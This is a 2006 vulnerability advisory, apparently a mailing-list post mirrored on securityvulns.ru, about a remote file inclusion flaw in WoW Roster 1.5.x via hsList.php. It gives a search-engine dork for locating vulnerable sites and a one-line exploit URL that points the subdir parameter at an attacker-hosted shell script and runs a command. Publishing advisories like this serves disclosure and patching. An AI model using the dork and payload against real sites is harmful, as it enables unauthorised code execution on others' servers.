Computer Security

Security Advisory: WoW Roster <= 1.5.x Remote File Include (hsList.php)
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [Full-disclosure] Content Management Framework "G3" - XSS Vulnerability in Search Function

  [Full-disclosure] X-Statics 1.20 SQL Injection Vulnerability

  [Full-disclosure] X-Protection 1.10 SQL Injection Vulnerability

  [Full-disclosure] X-Poll SQL Injection Vulnerability

From:AG Spider <ag-spider_(at)_hotmail.com>
Date:02.08.2006
Subject:WoW Roster <= 1.5.x Remote File Include (hsList.php)

Title : WoW Roster <= 1.5.x Remote File Include (hsList.php)

###############################################################################

Discovered By  ::::  AG-Spider

-----------------------------------------------------------------------------
Class  : Remote file include
Rish   : Danger
-----------------------------------------------------------------------------

dork        : "wow roster version 1.5"

Exploit    :  
http://www.site.com/[wow_roster_path]/hsList.php?subdir=http://[Shellc0de]]/cmd.
txt?&cmd=ls


----------------------------------------------------------------------------

greetz4: [ Black-Code  -  KILLERxXx - KaBaRa.HaCk .eGy]

c0natct us : AG-Spider [ at ] HoTMail.CoM
thx 2 :::::: Lezr.com & 3asfh.net

_________________________________________________________________
The new MSN Search Toolbar now includes Desktop search!
http://join.msn.com/toolbar/overview

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server